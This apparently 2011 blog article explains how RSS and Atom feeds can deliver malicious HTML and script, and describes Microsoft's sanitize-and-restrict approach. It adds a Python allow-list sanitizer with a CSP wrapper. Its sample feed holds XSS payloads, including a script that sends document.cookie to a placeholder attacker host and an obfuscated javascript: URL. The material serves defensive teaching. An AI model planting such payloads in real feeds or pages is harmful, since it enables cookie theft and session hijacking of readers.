Monday 21 February 2011

RSS Feed and RSS Reader Security Risks



       Anti-malware software and spam filters are now in use on nearly every desktop. Yet hostile content may still be pouring into your machines from an unsuspected source: RSS and Atom feeds.

       Both feed formats deliver updated news and other Web content automatically to subscribers' readers and aggregators. But a feed entry is, in most cases, a block of HTML, and HTML can carry script, hostile links and pointers to malware downloads. Feed suppliers often scoop up that content from elsewhere automatically, without checking what it contains, so whatever was in the upstream post, good or bad, is passed straight to subscribers' computers.

       Malicious HTML and JavaScript can enter the feeds of even well-known and respected RSS and Atom suppliers when material is pulled in from other sources without first being sanitized. A reader that renders such an entry without restriction executes that script.

       Furthermore, the supplier itself may be a source for yet other suppliers. Such "re-syndication," which can expose a single poisoned entry to millions of computers within a few hours, makes RSS and Atom feeds a tempting delivery medium for savvy attackers.

What to Do

       Simply banning the use of readers and aggregators isn't a good idea, since the move denies users access to truly useful content, such as news updates. A better approach is to standardize on an approved reader or aggregator that sanitizes feed content before storing or rendering it, and that renders whatever remains with script disabled, so that malicious code is removed before it can do any damage.

       Some vendors are aware of the feed security problem and have taken steps to address it. Microsoft is one example. According to Microsoft, Windows Vista and Internet Explorer 7 employ a two-pronged approach to feed security:
  1. Sanitization: The Windows RSS Platform uses several techniques to strip out dangerous JavaScript and several other forms of malicious HTML before storing the feed content. 
  2. Restricted Feed View: In case the first step misses something, Internet Explorer renders its feed view in the Restricted zone, where script is disabled, so that no dangerous script in a feed will run even if it made it through the previous step.
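
       The two layers Microsoft describes, sanitize on the way in and render with script disabled, can be built in a few dozen lines. The following is an added example, not code from this page or from Microsoft's RSS Platform: a standard-library Python sanitizer for RSS 2.0 and Atom entries, paired with a rendering wrapper that applies a Content-Security-Policy forbidding script as the second layer. The feed, the attacker.invalid host, the tag and attribute allow-lists and the CSP string are all constructed for the example; a production reader would also parse untrusted XML with defusedxml rather than ElementTree.

```python
# Added example, not the page's or Microsoft's code: the article's two layers on the
# Python standard library.  Layer 1 sanitises the HTML in RSS/Atom entries before it is
# stored; layer 2 renders stored HTML under a CSP that forbids script.  Data is constructed.
import re
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser

ATOM = "{http://www.w3.org/2005/Atom}"
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br", "img", "pre", "code"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
_CTRL = "".join(map(chr, range(0x21)))  # NUL..space; browsers strip these off URL ends
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)  # scheme must precede the first "/"

def extract_entries(feed_xml):
    """Yield (title, html) for RSS 2.0 items and Atom entries.  The markup arrives as text
    (escaped or CDATA).  Prefer defusedxml over ElementTree for untrusted feeds."""
    root = ET.fromstring(feed_xml)
    if root.tag == "rss":
        for item in root.iter("item"):
            yield item.findtext("title", ""), item.findtext("description", "")
    else:
        for entry in root.iter(ATOM + "entry"):
            body = entry.find(ATOM + "content")
            if body is None:
                body = entry.find(ATOM + "summary")
            yield entry.findtext(ATOM + "title", ""), (body.text if body is not None else "") or ""

def safe_url(value):
    """Allow only http(s)/mailto/relative URLs.  Browsers drop tab/newline anywhere in a
    URL and leading/trailing controls before parsing, so normalise the same way first."""
    cleaned = value.translate({9: None, 10: None, 13: None}).strip(_CTRL)
    m = _SCHEME.match(cleaned)
    return m is None or m.group(1).lower() in SAFE_SCHEMES

class Sanitizer(HTMLParser):
    """Allow-list sanitiser: unknown tags are dropped (their text kept), script/style
    bodies are dropped entirely, attributes survive only if allow-listed and safe."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self.skip_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, ()) or (
                    name in ("href", "src") and not safe_url(value)):
                self.dropped.append(f"{tag}@{name}")  # e.g. img@onerror, a@href
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # convert_charrefs turned "&lt;script&gt;" text into "<script>": re-escape it
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

def sanitize_html(html):
    """Layer 1: returns (clean_html, dropped) so the reader can log what a feed tried."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped

def restricted_document(title, clean_html):
    """Layer 2: a page whose CSP forbids script, plugins and form posts, the same idea
    as rendering the feed view in a restricted zone."""
    csp = "default-src 'none'; img-src https:"
    return ('<!doctype html><html><head><meta charset="utf-8">'
            f'<meta http-equiv="Content-Security-Policy" content="{csp}">'
            f"<title>{escape(title)}</title></head><body>{clean_html}</body></html>")

def process_feed(feed_xml):
    """Run every entry through layer 1; returns [(title, clean_html, dropped), ...]."""
    return [(t, *sanitize_html(h)) for t, h in extract_entries(feed_xml)]

# Constructed Atom feed: one legitimate paragraph plus four payloads an upstream
# re-syndicator might pass through untouched (attacker.invalid is a placeholder).
SAMPLE_ATOM = """<feed xmlns="http://www.w3.org/2005/Atom"><title>Re-syndicated news</title>
<entry><title>Quarterly update</title><content type="html">&lt;p&gt;Read the &lt;a href="https://example.com/report"&gt;report&lt;/a&gt;.&lt;/p&gt;
&lt;script&gt;new Image().src='https://attacker.invalid/?c='+document.cookie&lt;/script&gt;
&lt;img src="x" onerror="alert(1)"&gt;
&lt;a href="jAvAsCrIpT:alert(2)"&gt;click&lt;/a&gt;
&lt;a href="java&amp;#9;script:alert(3)"&gt;tab trick&lt;/a&gt;</content></entry></feed>"""

if __name__ == "__main__":
    print(process_feed(SAMPLE_ATOM))
```

       Two points the list above does not spell out. First, the sanitizer is an allow-list, not a list of "dangerous JavaScript" patterns: anything not explicitly permitted is dropped, which is what lets it survive payloads it has never seen. Second, the java&#9;script: entry shows why URL checks must normalize the way browsers do before testing the scheme; a naive startswith("javascript:") test passes it. The dropped list is what a security operations team would want logged per feed, since a supplier that keeps delivering script or img@onerror is a supplier to unsubscribe from.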